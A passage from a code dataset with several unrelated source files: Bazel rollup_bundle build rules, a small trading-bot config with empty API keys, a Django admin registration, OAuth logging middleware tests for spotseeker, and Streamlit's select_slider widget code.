executable = ctx.executable._terser_wrapped,
inputs = inputs,
outputs = outputs,
arguments = [args],
)
def run_sourcemapexplorer(ctx, js, map, output):
"""Runs source-map-explorer to produce an HTML visualization of the sourcemap.
Args:
ctx: bazel rule execution context
js: Javascript bundle
map: sourcemap from the bundle back to original sources
output: file where the HTML report is written
"""
# We must run in a shell in order to redirect stdout.
# TODO(alexeagle): file a feature request on ctx.actions.run so that stdout
# could be natively redirected to produce the output file
ctx.actions.run_shell(
inputs = [js, map],
tools = [ctx.executable._source_map_explorer],
outputs = [output],
command = "$1 --html $2 $3 > $4",
arguments = [
ctx.executable._source_map_explorer.path,
js.path,
map.path,
output.path,
],
)
def _generate_toplevel_entry(ctx, bundles_folder, output):
"""Generates a native ESmodule that imports the entry point
"""
main_entry_point_basename = _entry_point_path(ctx).split("/")[-1] + ".js"
ctx.actions.write(output, """import('./%s/%s');""" % (bundles_folder, main_entry_point_basename))
def _generate_code_split_entry(ctx, bundles_folder, output):
"""Generates a SystemJS boilerplate/entry point file.
See doc for additional_entry_points for more information
on purpose and usage of this generated file.
The SystemJS packages map written to the file is generated
from the entry_point and additional_entry_points attributes and
targets the specific bundle variant specified by `folder`.
For example, a rollup_bundle may be configured like so:
```
rollup_bundle(
name = "bundle",
additional_entry_points = [
"src/hello-world/hello-world.module.ngfactory",
"src/todos/todos.module.ngfactory",
],
entry_point = "src/main.prod",
deps = ["//src"],
)
```
In this case, the main_entry_point_dirname will evaluate to
`src/` and this will be stripped from the entry points for
the map. If folder is `bundle_chunks`, the generated SystemJS
boilerplate/entry point file will look like:
```
(function(global) {
System.config({
packages: {
'': {map: {
"./main.prod": "bundle_chunks/main.prod",
"./hello-world/hello-world.module.ngfactory": "bundle_chunks/hello-world.module.ngfactory",
"./todos/todos.module.ngfactory": "bundle_chunks/todos.module.ngfactory"},
defaultExtension: 'js'},
}
});
System.import('main.prod').catch(function(err) {
console.error(err);
});
})(this);
```
Args:
ctx: bazel rule execution context
bundles_folder: the folder name with the bundled chunks to map to
output: the file to generate
"""
entry_point_path = _entry_point_path(ctx)
main_entry_point_basename = entry_point_path.split("/")[-1] + ".js"
main_entry_point_dirname = "/".join(entry_point_path.split("/")[:-1]) + "/"
entry_points = {}
for e in [entry_point_path] + ctx.attr.additional_entry_points:
entry_point = e[len(main_entry_point_dirname):]
entry_points["./" + entry_point] = bundles_folder + "/" + entry_point.split("/")[-1]
ctx.actions.expand_template(
output = output,
template = ctx.file._system_config_tmpl,
substitutions = {
"TMPL_entry_points": str(entry_points),
"TMPL_main_entry_point": main_entry_point_basename,
},
)
def _rollup_bundle(ctx):
if len(ctx.attr.entry_point.files.to_list()) != 1:
fail("labels in entry_point must contain exactly one file")
if ctx.attr.additional_entry_points:
# Generate code split bundles if additional entry points have been specified.
# See doc for additional_entry_points for more information.
# Note: "_chunks" is needed on the output folders since ctx.label.name + ".es2015" is already
# a folder that contains the re-rooted es2015 sources
rollup_config = write_rollup_config(ctx, output_format = "es", additional_entry_points = ctx.attr.additional_entry_points)
code_split_es2015_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_es2015")
_run_rollup(ctx, _collect_es2015_sources(ctx), rollup_config, code_split_es2015_output_dir)
code_split_es2015_min_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_es2015")
_run_terser(ctx, code_split_es2015_output_dir, code_split_es2015_min_output_dir, None)
code_split_es2015_min_debug_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_debug_es2015")
_run_terser(ctx, code_split_es2015_output_dir, code_split_es2015_min_debug_output_dir, None, debug = True)
code_split_es5_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks")
_run_tsc_on_directory(ctx, code_split_es2015_output_dir, code_split_es5_output_dir)
code_split_es5_min_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min")
_run_terser(ctx, code_split_es5_output_dir, code_split_es5_min_output_dir, None)
code_split_es5_min_debug_output_dir = ctx.actions.declare_directory(ctx.label.name + "_chunks_min_debug")
_run_terser(ctx, code_split_es5_output_dir, code_split_es5_min_debug_output_dir, None, debug = True)
# Generate the SystemJS boilerplate/entry point files
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_es2015", ctx.outputs.build_es2015)
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_min_es2015", ctx.outputs.build_es2015_min)
_generate_toplevel_entry(ctx, ctx.label.name + "_chunks_min_debug_es2015", ctx.outputs.build_es2015_min_debug)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks_min", ctx.outputs.build_es5_min)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks_min_debug", ctx.outputs.build_es5_min_debug)
# There is no UMD/CJS bundle when code-splitting but we still need to satisfy the output
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_umd)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_umd_min)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_cjs)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5_umd)
_generate_code_split_entry(ctx, ctx.label.name + "_chunks", ctx.outputs.build_es5_umd_min)
# There is no source map explorer output when code-splitting but we still need to satisfy the output
ctx.actions.expand_template(
output = ctx.outputs.explore_html,
template = ctx.file._no_explore_html,
substitutions = {},
)
files = [
ctx.outputs.build_es2015,
ctx.outputs.build_es2015_min,
ctx.outputs.build_es2015_min_debug,
ctx.outputs.build_es5,
ctx.outputs.build_es5_min,
ctx.outputs.build_es5_min_debug,
code_split_es2015_output_dir,
code_split_es2015_min_output_dir,
code_split_es2015_min_debug_output_dir,
code_split_es5_output_dir,
code_split_es5_min_output_dir,
code_split_es5_min_debug_output_dir,
]
output_group = OutputGroupInfo(
es2015 = depset([ctx.outputs.build_es2015, code_split_es2015_output_dir]),
es2015_min = depset([ctx.outputs.build_es2015_min, code_split_es2015_min_output_dir]),
es2015_min_debug = depset([ctx.outputs.build_es2015_min_debug, code_split_es2015_min_debug_output_dir]),
es5 = depset([ctx.outputs.build_es5, code_split_es5_output_dir]),
es5_min = depset([ctx.outputs.build_es5_min, code_split_es5_min_output_dir]),
es5_min_debug = depset([ctx.outputs.build_es5_min_debug, code_split_es5_min_debug_output_dir]),
)
else:
# Generate the bundles
rollup_config = write_rollup_config(ctx)
es2015_map = run_rollup(ctx, _collect_es2015_sources(ctx), rollup_config, ctx.outputs.build_es2015)
es2015_min_map = run_terser(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es2015_min, config_name = ctx.label.name + "es2015_min", in_source_map = es2015_map)
es2015_min_debug_map = run_terser(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es2015_min_debug, debug = True, config_name = ctx.label.name + "es2015_min_debug", in_source_map = es2015_map)
_run_tsc(ctx, ctx.outputs.build_es2015, ctx.outputs.build_es5)
es5_min_map = run_terser(ctx, ctx.outputs.build_es5, ctx.outputs.build_es5_min)
es5_min_debug_map = run_terser(ctx, ctx.outputs.build_es5, ctx.outputs.build_es5_min_debug, debug = True)
cjs_rollup_config = write_rollup_config(ctx, filename = "_%s_cjs.rollup.conf.js", output_format = "cjs")
cjs_map = run_rollup(ctx, _collect_es2015_sources(ctx), cjs_rollup_config, ctx.outputs.build_cjs)
umd_rollup_config = write_rollup_config(ctx, filename = "_%s_umd.rollup.conf.js", output_format = "umd")
umd_map = run_rollup(ctx, _collect_es2015_sources(ctx), umd_rollup_config, ctx.outputs.build_umd)
umd_min_map = run_terser(ctx, ctx.outputs.build_umd, ctx.outputs.build_umd_min, config_name = ctx.label.name + "umd_min", in_source_map = umd_map)
_run_tsc(ctx, ctx.outputs.build_umd, ctx.outputs.build_es5_umd)
es5_umd_min_map = run_terser(ctx, ctx.outputs.build_es5_umd, ctx.outputs.build_es5_umd_min, config_name = ctx.label.name + "es5umd_min")
run_sourcemapexplorer(ctx, ctx.outputs.build_es5_min, es5_min_map, ctx.outputs.explore_html)
files = [ctx.outputs.build_es5_min, es5_min_map]
output_group = OutputGroupInfo(
cjs = depset([ctx.outputs.build_cjs, cjs_map]),
es2015 = depset([ctx.outputs.build_es2015, es2015_map]),
es2015_min = depset([ctx.outputs.build_es2015_min, es2015_min_map]),
es2015_min_debug = depset([ctx.outputs.build_es2015_min_debug, es2015_min_debug_map]),
es5 = depset([ctx.outputs.build_es5]),
es5_min = depset([ctx.outputs.build_es5_min, es5_min_map]),
es5_min_debug = depset([ctx.outputs.build_es5_min_debug, es5_min_debug_map]),
es5_umd = depset([ctx.outputs.build_es5_umd]),
es5_umd_min = depset([ctx.outputs.build_es5_umd_min, es5_umd_min_map]),
umd = depset([ctx.outputs.build_umd, umd_map]),
umd_min = depset([ctx.outputs.build_umd_min, umd_min_map]),
)
return [
DefaultInfo(
files = depset(files),
# NB: we don't include any runfiles here since they would always be built
# regardless of whether they are requested or not
),
output_group,
]
# Expose our list of aspects so derivative rules can override the deps attribute and
# add their own additional aspects.
# If users are in a different repo and load the aspect themselves, they will create
# different Provider symbols (e.g. NodeModuleInfo) and we won't find them.
# So users must use these symbols that are load'ed in rules_nodejs.
ROLLUP_DEPS_ASPECTS = [rollup_module_mappings_aspect, collect_node_modules_aspect]
ROLLUP_ATTRS = {
"srcs": attr.label_list(
doc = """JavaScript source files from the workspace.
These can use ES2015 syntax and ES Modules (import/export)""",
allow_files = [".js"],
),
"additional_entry_points": attr.string_list(
doc = """Additional entry points of the application for code splitting, passed as the input to rollup.
These should be a path relative to the workspace root.
When additional_entry_points are specified, rollup_bundle
will split the bundle in multiple entry points and chunks.
There will be a main entry point chunk as well as entry point
chunks for each additional_entry_point. The file names
of these entry points will correspond to the file names
specified in entry_point and additional_entry_points.
There will also be one or more common chunks that are shared
between entry points named chunk-<HASH>.js. The number
of common chunks is variable depending on the code being
bundled.
Entry points and chunks will be outputted to folders:
- <label-name>_chunks_es2015 // es2015
- <label-name>_chunks // es5
- <label-name>_chunks_min // es5 minified
- <label-name>_chunks_min_debug // es5 minified debug
The following files will be outputted that contain the
SystemJS boilerplate to map the entry points to their file
names and load the main entry point:
flavors:
- <label-name>.es2015.js // es2015 with EcmaScript modules
- <label-name>.js // es5 syntax with CJS modules
- <label-name>.min.js // es5 minified
- <label-name>.min_debug.js // es5 minified debug
NOTE: additional_entry_points MUST be in the same folder or deeper than
the main entry_point for the SystemJS boilerplate/entry point to
be valid. For example, if the main entry_point is
`src/main` then all additional_entry_points must be under
`src/**` such as `src/bar` or `src/foo/bar`. Alternate
additional_entry_points configurations are valid but the
SystemJS boilerplate/entry point files will not be usable and
it is up to the user in these cases to handle the SystemJS
boilerplate manually.
It is sufficient to load one of these SystemJS boilerplate/entry point
files as a script in your HTML to load your application""",
),
"entry_point": attr.label(
doc = """The starting point of the application, passed as the `--input` flag to rollup.
If the entry JavaScript file belongs to the same package (as the BUILD file),
you can simply reference it by its relative name to the package directory:
```
rollup_bundle(
name = "bundle",
entry_point = ":main.js",
)
```
You can specify the entry point as a typescript file so long as you also include
the ts_library target in deps:
```
ts_library(
name = "main",
srcs = ["main.ts"],
)
rollup_bundle(
name = "bundle",
deps = [":main"]
entry_point = ":main.ts",
)
```
The rule will use the corresponding `.js` output of the ts_library rule as the entry point.
If the entry point target is a rule, it should produce a single JavaScript entry file that will be passed to the nodejs_binary rule.
For example:
```
filegroup(
name = "entry_file",
srcs = ["main.js"],
)
rollup_bundle(
name = "bundle",
entry_point = ":entry_file",
)
```
""",
mandatory = True,
allow_single_file = True,
),
"global_name": attr.string(
doc = """A name given to this package when referenced as a global variable.
This name appears in the bundle module incantation at the beginning of the file,
and governs the global symbol added to the global context (e.g. `window`) as a side-
effect of loading the UMD/IIFE JS bundle.
Rollup doc: "The variable name, representing your iife/umd bundle, by which other scripts on the same page can access it."
This is passed to the `output.name` setting in Rollup.""",
),
"globals": attr.string_dict(
doc = """A dict of symbols that reference external scripts.
The keys are variable names that appear in the program,
and the values are the symbol to reference at runtime in a global context (UMD bundles).
For example, a program referencing @angular/core should use ng.core
as the global reference, so Angular users should include the mapping
`"@angular/core":"ng.core"` in the globals.""",
default = {},
),
"license_banner": attr.label(
doc = """A .txt file passed to the `banner` config option of rollup.
The contents of the file will be copied to the top of the resulting bundles.
Note that you can replace a version placeholder in the license file, by using
the special version `0.0.0-PLACEHOLDER`. See the section on stamping in the README.""",
allow_single_file = [".txt"],
),
"node_modules": attr.label(
doc = """Dependencies from npm that provide some modules that must be
resolved by rollup.
This attribute is DEPRECATED. As of version 0.13.0 the recommended approach
to npm dependencies is to use fine grained npm dependencies which are setup
with the `yarn_install` or `npm_install` rules. For example, in a rollup_bundle
target that used the `node_modules` attribute,
```
rollup_bundle(
name = "bundle",
...
node_modules = "//:node_modules",
)
```
which specifies all files within the `//:node_modules` filegroup
to be inputs to the `bundle`. Using fine grained npm dependencies,
`bundle` is defined with only the npm dependencies that are
needed:
```
rollup_bundle(
name = "bundle",
...
deps = [
"@npm//foo",
"@npm//bar",
...
],
)
```
In this case, only the `foo` and `bar` npm packages and their
transitive deps are included as inputs to the `bundle` target
which reduces the time required to setup the runfiles for this
target (see https://github.com/bazelbuild/bazel/issues/5153).
The @npm external repository and the fine grained npm package
targets are setup using the `yarn_install` or `npm_install` rule
in your WORKSPACE file:
yarn_install(
name = "npm",
package_json = "//:package.json",
yarn_lock = "//:yarn.lock",
)
""",
default = Label("//:node_modules_none"),
),
"deps": attr.label_list(
doc = """Other rules that produce JavaScript outputs, such as `ts_library`.""",
aspects = ROLLUP_DEPS_ASPECTS,
),
"_no_explore_html": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:no_explore.html"),
allow_single_file = True,
),
"_rollup": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:rollup"),
),
"_rollup_config_tmpl": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:rollup.config.js"),
allow_single_file = True,
),
"_source_map_explorer": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:source-map-explorer"),
),
"_system_config_tmpl": attr.label(
default = Label("@build_bazel_rules_nodejs//internal/rollup:system.config.js"),
allow_single_file = True,
),
"_terser_wrapped": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:terser-wrapped"),
),
"_tsc": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:tsc"),
),
"_tsc_directory": attr.label(
executable = True,
cfg = "host",
default = Label("@build_bazel_rules_nodejs//internal/rollup:tsc-directory"),
),
}
ROLLUP_OUTPUTS = {
"build_cjs": "%{name}.cjs.js",
"build_es2015": "%{name}.es2015.js",
"build_es2015_min": "%{name}.min.es2015.js",
"build_es2015_min_debug": "%{name}.min_debug.es2015.js",
"build_es5": "%{name}.js",
"build_es5_min": "%{name}.min.js",
"build_es5_min_debug": "%{name}.min_debug.js",
"build_es5_umd": "%{name}.es5umd.js",
"build_es5_umd_min": "%{name}.min.es5umd.js",
"build_umd": "%{name}.umd.js",
"build_umd_min": "%{name}.min.umd.js",
"explore_html": "%{name}.explore.html",
}
rollup_bundle = rule(
implementation = _rollup_bundle,
attrs = ROLLUP_ATTRS,
outputs = ROLLUP_OUTPUTS,
)
"""Produces several bundled JavaScript files using Rollup and terser.
Load it with
`load("@build_bazel_rules_nodejs//:defs.bzl", "rollup_bundle")`
It performs this work in several separate processes:
1. Call rollup on the original sources
2. Downlevel the resulting code to es5 syntax for older browsers
3. Minify the bundle with terser, possibly with pretty output for human debugging.
The default output of a `rollup_bundle` rule is the non-debug-minified es5 bundle.
However you can request one of the other outputs with a dot-suffix on the target's name.
For example, if your `rollup_bundle` is named `my_rollup_bundle`, you can use one of these labels:
To request the ES2015 syntax (e.g. `class` keyword) without downleveling or minification, use the `:my_rollup_bundle.es2015.js` label.
To request the ES5 downleveled bundle without minification, use the `:my_rollup_bundle.js` label
To request the debug-minified es5 bundle, use the `:my_rollup_bundle.min_debug.js` label.
To request a UMD-bundle, use the `:my_rollup_bundle.umd.js` label.
To request a CommonJS bundle, use the `:my_rollup_bundle.cjs.js` label.
You can also request an analysis from source-map-explorer by building the `:my_rollup_bundle.explore.html` label.
However this is currently broken for `rollup_bundle` ES5 mode because we use tsc for downleveling and
it doesn't compose the resulting sourcemaps with an input sourcemap.
See https://github.com/bazelbuild/rules_nodejs/issues/175
For debugging, note that the `rollup.config.js` and `terser.config.json` files can be found in the bazel-bin folder next to the resulting bundle.
An example usage can be found in https://github.com/bazelbuild/rules_nodejs/tree/master/internal/e2e/rollup
"""
# Adding the above docstring as `doc` attribute
# causes a build error but ONLY on Ubuntu 14.04 on BazelCI.
# ```
# File "internal/npm_package/npm_package.bzl", line 221, in <module>
# outputs = NPM_PACKAGE_OUTPUTS,
# TypeError: rule() got an unexpected keyword argument 'doc'
# ```
# This error does not occur on any other platform on BazelCI including Ubuntu 16.04.
# TODO(gregmagolan): Figure out why and/or file a bug to Bazel
# See https://github.com/bazelbuild/buildtools/issues/471#issuecomment-485283200
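# Illustrative usage (an addition, not part of the original file): a minimal BUILD
# sketch, assuming "//src" is a ts_library or other JS-producing rule that provides
# the sources imported from "main.js"; the dot-suffixed labels described in the
# docstring above are then requested directly on the command line.
#
#     load("@build_bazel_rules_nodejs//:defs.bzl", "rollup_bundle")
#
#     rollup_bundle(
#         name = "my_rollup_bundle",
#         entry_point = ":main.js",
#         deps = ["//src"],
#     )
#
# Then, for example, `bazel build :my_rollup_bundle.min_debug.js` produces the
# debug-minified es5 bundle and `bazel build :my_rollup_bundle.umd.js` the UMD bundle.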
|
py | b414b2f944365729384c6c85b2c3aeedd030ff75 | apiKey = ''
apiSecretKey = ''
markets = {'BTC' : 'hoard', 'ETH' : 'hoard'}
tradeAmount = 100.0
|
py | b414b47de56f2047a1e268d101e4174811720390 | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import User
admin.site.register(User, UserAdmin)
|
py | b414b555cfc6d52887267a60e8de1a3cef44712a | # Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
try:
from StringIO import StringIO
except ModuleNotFoundError:
from io import StringIO
from django.test import TestCase
from django.conf import settings
from spotseeker_server.models import Spot, TrustedOAuthClient
from django.test.client import Client
import re
import simplejson as json
import logging
import hashlib
import time
import random
from oauth_provider.models import Consumer
from django.test.utils import override_settings
from mock import patch
from spotseeker_server import models
from oauthlib import oauth1
@override_settings(
SPOTSEEKER_SPOT_FORM="spotseeker_server.default_forms."
"spot.DefaultSpotForm",
SPOTSEEKER_SPOTEXTENDEDINFO_FORM="spotseeker_server.default_forms."
"spot.DefaultSpotExtendedInfoForm",
SPOTSEEKER_AUTH_ADMINS=("pmichaud",),
)
class SpotAuthOAuthLogger(TestCase):
@classmethod
def setUpTestData(self):
spot = Spot.objects.create(
name="This is for testing the oauth module", capacity=10
)
self.spot = spot
self.url = "/api/v1/spot/%s" % self.spot.pk
def setUp(self):
new_middleware = []
has_logger = False
self.original_middleware = settings.MIDDLEWARE
for middleware in settings.MIDDLEWARE:
new_middleware.append(middleware)
if middleware == "spotseeker_server.logger.oauth.LogMiddleware":
has_logger = True
if not has_logger:
new_middleware.append(
"spotseeker_server.logger.oauth.LogMiddleware"
)
settings.MIDDLEWARE = new_middleware
self.stream = StringIO()
self.handler = logging.StreamHandler(self.stream)
self.log = logging.getLogger("spotseeker_server.logger.oauth")
self.log.setLevel(logging.INFO)
for handler in self.log.handlers:
self.log.removeHandler(handler)
self.log.addHandler(self.handler)
def test_log_value_2_legged(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
consumer_name = "Test consumer"
key = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
secret = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
create_consumer = Consumer.objects.create(
name=consumer_name, key=key, secret=secret
)
client = oauth1.Client(key, client_secret=secret)
_, headers, _ = client.sign(
"http://testserver/api/v1/spot/%s" % self.spot.pk
)
response = Client().get(
self.url, HTTP_AUTHORIZATION=headers["Authorization"]
)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\[.*?\] ([\d]+)\t"(.*?)"\t-\t"GET /api'
r'/v1/spot/([\d]+)" ([\d]+) ([\d]+)',
log_message,
)
consumer_id = int(matches.group(1))
consumer_name = matches.group(2)
spot_id = int(matches.group(3))
status_code = int(matches.group(4))
response_size = int(matches.group(5))
self.assertEquals(
consumer_id, create_consumer.pk, "Logging correct consumer PK"
)
self.assertEquals(
consumer_name,
create_consumer.name,
"Logging correct consumer name",
)
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content.decode()),
"Logging correct content size",
)
def test_log_trusted_3_legged(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
consumer_name = "Trusted test consumer"
key = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
secret = hashlib.sha1(
"{0} - {1}".format(random.random(), time.time()).encode(
"utf-8"
)
).hexdigest()
create_consumer = Consumer.objects.create(
name=consumer_name, key=key, secret=secret
)
trusted_consumer = TrustedOAuthClient.objects.create(
consumer=create_consumer,
is_trusted=True,
bypasses_user_authorization=False,
)
client = oauth1.Client(key, client_secret=secret)
_, headers, _ = client.sign(
"http://testserver/api/v1/spot/%s" % self.spot.pk
)
c = Client()
response = c.get(
self.url, HTTP_AUTHORIZATION=headers["Authorization"]
)
etag = response["ETag"]
spot_dict = json.loads(response.content)
spot_dict["name"] = "Failing to modify oauth"
spot_dict["location"] = {"latitude": 55, "longitude": -30}
response = c.put(
self.url,
json.dumps(spot_dict),
content_type="application/json",
If_Match=etag,
HTTP_AUTHORIZATION=headers["Authorization"],
HTTP_X_OAUTH_USER="pmichaud",
)
self.assertEquals(
response.status_code,
200,
"Accespts a PUT from a trusted oauth client",
)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\n\[.*?\] ([\d]+)\t"(.*?)"\t(.*?)\t"PUT /api/v1/spo'
r't/([\d]+)" ([\d]+) ([\d]+)',
log_message,
re.MULTILINE,
)
consumer_id = int(matches.group(1))
consumer_name = matches.group(2)
user_name = matches.group(3)
spot_id = int(matches.group(4))
status_code = int(matches.group(5))
response_size = int(matches.group(6))
self.assertEquals(
consumer_id, create_consumer.pk, "Logging correct consumer PK"
)
self.assertEquals(
consumer_name,
create_consumer.name,
"Logging correct consumer name",
)
self.assertEquals(
user_name, "pmichaud", "Logging correct oauth username"
)
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content.decode()),
"Logging correct content size",
)
def test_invalid(self):
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.oauth"
):
c = Client()
response = c.get(self.url)
with self.settings(
SPOTSEEKER_AUTH_MODULE="spotseeker_server.auth.all_ok"
):
self.handler.flush()
log_message = self.stream.getvalue()
matches = re.search(
r'\[.*?\] -\t"-"\t-\t"GET /api/v1/spot'
r'/([\d]+)" ([\d]+) ([\d]+)',
log_message,
)
spot_id = int(matches.group(1))
status_code = int(matches.group(2))
response_size = int(matches.group(3))
self.assertEquals(spot_id, self.spot.pk, "Logging correct uri")
self.assertEquals(
status_code,
response.status_code,
"Logging correct status_code",
)
self.assertEquals(
response_size,
len(response.content),
"Logging correct content size",
)
def tearDown(self):
self.log.removeHandler(self.handler)
self.handler.close()
settings.MIDDLEWARE = self.original_middleware
|
py | b414b575ef5af8c78ea3c3c7181182b872671448 | # Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from textwrap import dedent
from typing import Any, Callable, Optional, cast
import streamlit
from streamlit.errors import StreamlitAPIException
from streamlit.proto.Slider_pb2 import Slider as SliderProto
from streamlit.scriptrunner import ScriptRunContext, get_script_run_ctx
from streamlit.state import (
register_widget,
WidgetArgs,
WidgetCallback,
WidgetKwargs,
)
from streamlit.type_util import Key, OptionSequence, ensure_indexable, to_key
from streamlit.util import index_
from .form import current_form_id
from .utils import check_callback_rules, check_session_state_rules
class SelectSliderMixin:
def select_slider(
self,
label: str,
options: OptionSequence = [],
value: Any = None,
format_func: Callable[[Any], Any] = str,
key: Optional[Key] = None,
help: Optional[str] = None,
on_change: Optional[WidgetCallback] = None,
args: Optional[WidgetArgs] = None,
kwargs: Optional[WidgetKwargs] = None,
*, # keyword-only arguments:
disabled: bool = False,
) -> Any:
"""
Display a slider widget to select items from a list.
This also allows you to render a range slider by passing a two-element
tuple or list as the `value`.
The difference between `st.select_slider` and `st.slider` is that
`select_slider` accepts any datatype and takes an iterable set of
options, while `slider` only accepts numerical or date/time data and
takes a range as input.
Parameters
----------
label : str
A short label explaining to the user what this slider is for.
options : Sequence, numpy.ndarray, pandas.Series, pandas.DataFrame, or pandas.Index
Labels for the slider options. All options will be cast to str
internally by default. For pandas.DataFrame, the first column is
selected.
value : a supported type or a tuple/list of supported types or None
The value of the slider when it first renders. If a tuple/list
of two values is passed here, then a range slider with those lower
and upper bounds is rendered. For example, if set to `(1, 10)` the
slider will have a selectable range between 1 and 10.
Defaults to first option.
format_func : function
            Function to modify the display of the labels from the options
            argument. It receives the option as an argument and its output
will be cast to str.
key : str or int
An optional string or integer to use as the unique key for the widget.
If this is omitted, a key will be generated for the widget
based on its content. Multiple widgets of the same type may
not share the same key.
help : str
An optional tooltip that gets displayed next to the select slider.
on_change : callable
An optional callback invoked when this select_slider's value changes.
args : tuple
An optional tuple of args to pass to the callback.
kwargs : dict
An optional dict of kwargs to pass to the callback.
disabled : bool
An optional boolean, which disables the select slider if set to True.
The default is False. This argument can only be supplied by keyword.
Returns
-------
any value or tuple of any value
The current value of the slider widget. The return type will match
the data type of the value parameter.
Examples
--------
>>> color = st.select_slider(
... 'Select a color of the rainbow',
... options=['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet'])
>>> st.write('My favorite color is', color)
And here's an example of a range select slider:
>>> start_color, end_color = st.select_slider(
... 'Select a range of color wavelength',
... options=['red', 'orange', 'yellow', 'green', 'blue', 'indigo', 'violet'],
... value=('red', 'blue'))
>>> st.write('You selected wavelengths between', start_color, 'and', end_color)
.. output::
https://share.streamlit.io/streamlit/docs/main/python/api-examples-source/widget.select_slider.py
height: 450px
"""
ctx = get_script_run_ctx()
return self._select_slider(
label=label,
options=options,
value=value,
format_func=format_func,
key=key,
help=help,
on_change=on_change,
args=args,
kwargs=kwargs,
disabled=disabled,
ctx=ctx,
)
def _select_slider(
self,
label: str,
options: OptionSequence = [],
value: Any = None,
format_func: Callable[[Any], Any] = str,
key: Optional[Key] = None,
help: Optional[str] = None,
on_change: Optional[WidgetCallback] = None,
args: Optional[WidgetArgs] = None,
kwargs: Optional[WidgetKwargs] = None,
disabled: bool = False,
ctx: Optional[ScriptRunContext] = None,
) -> Any:
key = to_key(key)
check_callback_rules(self.dg, on_change)
check_session_state_rules(default_value=value, key=key)
opt = ensure_indexable(options)
if len(opt) == 0:
raise StreamlitAPIException("The `options` argument needs to be non-empty")
is_range_value = isinstance(value, (list, tuple))
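        # Note: the frontend slider works purely on option *indices* (0..len(opt)-1);
        # the human-readable labels are sent separately via slider_proto.options, and
        # indices coming back from the UI are mapped through `opt` in the deserializer.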
def as_index_list(v):
is_range_value = isinstance(v, (list, tuple))
if is_range_value:
slider_value = [index_(opt, val) for val in v]
start, end = slider_value
if start > end:
slider_value = [end, start]
return slider_value
else:
# Simplify future logic by always making value a list
try:
return [index_(opt, v)]
except ValueError:
if value is not None:
raise
return [0]
# Convert element to index of the elements
slider_value = as_index_list(value)
slider_proto = SliderProto()
slider_proto.label = label
slider_proto.format = "%s"
slider_proto.default[:] = slider_value
slider_proto.min = 0
slider_proto.max = len(opt) - 1
slider_proto.step = 1 # default for index changes
slider_proto.data_type = SliderProto.INT
slider_proto.options[:] = [str(format_func(option)) for option in opt]
slider_proto.form_id = current_form_id(self.dg)
if help is not None:
slider_proto.help = dedent(help)
def deserialize_select_slider(ui_value, widget_id=""):
if not ui_value:
                # Widget has not been used; fall back to the original value.
ui_value = slider_value
# The widget always returns floats, so convert to ints before indexing
return_value = list(map(lambda x: opt[int(x)], ui_value)) # type: ignore[no-any-return]
# If the original value was a list/tuple, so will be the output (and vice versa)
return tuple(return_value) if is_range_value else return_value[0]
def serialize_select_slider(v):
return as_index_list(v)
current_value, set_frontend_value = register_widget(
"slider",
slider_proto,
user_key=key,
on_change_handler=on_change,
args=args,
kwargs=kwargs,
deserializer=deserialize_select_slider,
serializer=serialize_select_slider,
ctx=ctx,
)
# This needs to be done after register_widget because we don't want
# the following proto fields to affect a widget's ID.
slider_proto.disabled = disabled
if set_frontend_value:
slider_proto.value[:] = serialize_select_slider(current_value)
slider_proto.set_value = True
self.dg._enqueue("slider", slider_proto)
return current_value
@property
